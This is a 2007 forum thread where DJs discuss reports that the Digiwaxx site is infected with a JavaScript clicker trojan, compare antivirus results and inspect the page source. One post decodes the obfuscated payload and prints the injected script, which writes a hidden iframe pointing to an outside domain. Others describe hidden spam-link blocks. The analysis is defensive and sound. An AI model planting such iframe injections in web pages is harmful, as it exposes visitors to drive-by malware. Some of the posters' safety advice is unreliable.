Digiwaxx distributing Virus?

nik39 3:52 PM - 17 October, 2007
Just read in the german section ( scratchlive.net ) that digiwaxx's website is infected with

Trojan-Clicker.JS.Agent.h

...

Anyone knows any details? True or hoax?
Nicky Blunt 4:09 PM - 17 October, 2007
Nik I dl from them all the time I will run a virus scan now and see! I sure fuckin hope not!
Let me know if you find out anything else!

Cheers Blunt
djbriguy 4:22 PM - 17 October, 2007
I haven't heard anything or seen anything on my system. But then again i havne't done a scan in a while. Wouldn't surprise me though with all of the spam emails I get from them
Julls 4:23 PM - 17 October, 2007
You guys find out anything? There are some tracks I need to grab off of there. Plus, the German thread said that a virus scan will not be able to detect it.
Nicky Blunt 4:25 PM - 17 October, 2007
damn! No point in doing my scan then!

Thats really fucked up if thats the case!

Can someone Please translate the german thread for me as I dont speak or read german!
nik39 4:26 PM - 17 October, 2007
The germam thread says that their webpages contain the virus, not the audio files.
Nicky Blunt 4:33 PM - 17 October, 2007
so just by looking at the pages they give you a virus??

Imma report it to macafee site advisor & let them check it!

Ill tell you all what they say!
Nicky Blunt 4:36 PM - 17 October, 2007
Ok when i reported it site not tested was the seponse so Its been que'ed Ill check back on it later & let you know what the response is!
nik39 4:52 PM - 17 October, 2007
Where is the site advisor located?
Nicky Blunt 4:53 PM - 17 October, 2007
nik39 4:56 PM - 17 October, 2007
The problem is... it does not work with login protected pages.
Nicky Blunt 4:57 PM - 17 October, 2007
damn! Did not think of that!

& I thought I was being all clever too!
djbriguy 5:00 PM - 17 October, 2007
cant you give mcaffe your login info
djpuma_gemini 5:06 PM - 17 October, 2007
I wouldn't Then they go through and download the music and not leave any comments.
Nicky Blunt 5:06 PM - 17 October, 2007
not sure!

Will look into that!

Not too sure how digiwaxxx would feel about it tho!
djpuma_gemini 5:08 PM - 17 October, 2007
POssibility Im sure Mcafee hires better people than that, but you never know.

If this actually is true I could just DL digiwaxx tracks on my Mac & move to my PC on a thumb drive; but if this BS, it's much more convenient to go directly to the PC. What gives?

However I have the feeling that the message was a hoax and someone was pulling a leg.

I am sorry Latindj, you are incorrect. Please see below on the proper capitaliztion of English:

Question (From an N.C. State undergraduate): When making a statement about english as in "to master english," should the "E" be capitalized?

Answer: English is capitalized in every instance, unless you are talking about billiards, in which context "putting english on the ball" is conventional usage.

Nah, thats wrong. Try logging in from a different PC where no cookies have been set - digiwaxx still knows which tracks you have reviewed and how many points. W/o the original cooky.
slayed 7:45 PM - 26 October, 2007
What are the points for on digiwaxx?

The more points you have, the higher you are. In another words, they pay attention to you more. I think. Lol.
aphrobot 8:36 PM - 26 October, 2007
Hmmm...looks like it's a puzzle wrapped in a mystery, which is enshrouded by an enigma, eh ? Well, anyway....still no answer from digiwaxx (maybe i haven't got enough points to merit a reply...LOL). I've also been in touch with Kaspersky, and they say they will inform me of any measures I can take, or of any pertinent patches or updates....I suggest anyone with the same problem does the same. This nasty little bastard Trojan.Clicker.JS.Agent.h (maybe an upgraded Trojan-Clicker.JS.Agent.d ??) thingie seems to be able to mess around with javascript. Anyway, i really hope it is just Kaspersky 7 being difficult about some little cookie-issue, and that K. might come up with something. Oh yeah, and one other thing was funny...just as a test, I deinstalled Kaspersky, then installed the FREE version of Antivir, and immediately gained full access to the digiwaxx site, as usual. When i reinstalled Kaspersky though, I ran a full Virus scan, and absolutely NOTHING came up....no mention of any trojan clicker....until I tried to get back onto digiwaxx.com, that is !!

Weird....really weird

I'd use AVG Free or Kaspersky

A few days ago I tried to log in and AVG detected a virus. AVG healed it and I was able to log in afterwards. I've logged in several times since then with no virus threat and no problems other than slow page loads. I've done several full scans and no virus is detected.

That code shit is WAY over my head. Simple questions: Am I OK if I DL their tracks on a Mac if I clear history, empty cache, and open a new browser before surfing any further? Is it OK to move their mp3's directly to a PC on a thumb drive or should I burn them to a disc & re-import before moving them to a PC?
DJ Overpour 7:21 PM - 30 October, 2007
I was just making jokes about the code, if you can look at that and see whats wrong, you are smarter than anyone I know. :)

I cant really speculate on what would happen if you cleared the history and cache and all that and attempted to download files. I would imagine that it would be ok since there are hella peeps dling files off that site everyday, but ultimately thats up to you. And I wouldnt see any prob with moving files with the thumb drive either, burning them to a disc and reimporting them seems like a lot of work for nothing to me.
m0nster 7:27 PM - 30 October, 2007
not to throw gas on a fire, but i've heard of virus's that infect/ruin media on machines it infects, like having to use a specfic player to play mp3/video extensions after it's gotten ya...
dj cubicle 8:35 PM - 30 October, 2007
Okay, I've spent the last hour figuring out what that thing does.

In the long string of characters, they are taken off in pairs (3C, 53, 43, 52, 49, 50 etc)

Those numbers are hexidecimal and then get converted to Integers.

Those integers are Unicode characters that gets translated to letters/numbers/symbols.

Which gives you....

<SCRIPT>
window.status=’Done’;
document.write(’<iframe name=3704ab src=\’hxxp://www.megazo.org/trans.htm?’+Math.round(Math.random()*
21412)+’dcabbdf\’width=106 height=202 style=\’display: none\’></iframe>’)
</SCRIPT>

Not sure what megazo.org is, but I sure the hell wouldn't click on it.

At this point, I would say BUYER BEWARE when using DIGIWAXX.

I was gonna say it is probably a Hexadecimal code that translates by Javascript.

Anyway, Mac guys - there is a Freeware thing called Safari Enhancer...

www.celestialfrontiers.com

It enables a hidden feature in Safari called the Debug menu that allows you to log javascript among other things, I just hit the front page of the site and saw no malicious javascript errors.

BUT on the What we do page, I am looking at the source code and there are a shitload of hidden spam links embedded in the code.

Interesting .....
DJ Art Pumpin Payne 3:50 AM - 31 October, 2007
Hmmm same shit on the Our clients page...

Right below the google ads at the bottom the code starts:

</script>
</div></td>
</tr>
</table>
</div></td>
</tr>
</table>

<u style=display:none> then about 50 or 100 text <a href= links start about ambien and other pills and shit.

Ewwww, maybe I should put a condom on my Mac....

Ok, I DL'ed the Safari enhancer & now I have "debug" in the Safari menu to the right of "help". Now what?

P.S. I dragged the Safari enhancer installer to the trash & then deleted some 800+ items. What the hell was that?
DJ Art Pumpin Payne 7:19 AM - 31 October, 2007
It's not harmful. The main thing about Safari Enhancer is that it emulates other Browsers so if you hit a site that requires Internet Explorer or Firefox, you can do Open WIth> and have Safari appear to the site to be IE or Firefox.

Snippit editor is cool, grab bits of text or HTML. Also keyboard and mouse shortcuts are helpful.

But anyway, go to Log javascript exceptions. Go to a webpage. and then go Show Javascript Console and it shows you all the unsafe pages or javascript errors.

Did you have shit in the Trash before? Safari enhancer shouldn't have 800 items.

I'm always emptying the trash & restarting. The only thing I can think of is it freed up shit I tried to clean up out of app's etc. a couple months ago when I wanted to get more free HD space.

Now I'll go to digiwaxx and see what show ups in the javascript exceptions.
bourbonstmc 7:50 AM - 31 October, 2007
Javascript console was empty when I was on the home page & new tracks page. When I DL'ed a track this showed up:

Type error: undefined value.
http//www.digiwaxx.com/Members/track.php?id=2400# (I deleted the colon after http so it didn't show up here as a live link)
Line: 231

Others above in the thread were saying "megazo.org" was showing up in the code. I googled megazo.org & found what seems to be evidence they've been used as a redirect on at least one other site:

hmm...i don't see how a couple of people "testing things out" can be more lucrative than making sure ALL digiwaxx-members can download tracks without the risk of trojan infection. Yeah, the more i've thought about it, the more I think a pre-Intel Mac with no windows is the Sherman tank of the internet. I surf porn, use a myspace page that's loaded with questionable code, etc. Just clear the history, empty the cache, close Safari and restart- and Boom! you're good.

In the other link, guys are talking about megazo.org being inserted into the code on another site and used to re-direct to a third site that installs a trojan horse. They don't believe the original site was to blame, but inadvertently had allowed their code to be fucked with.
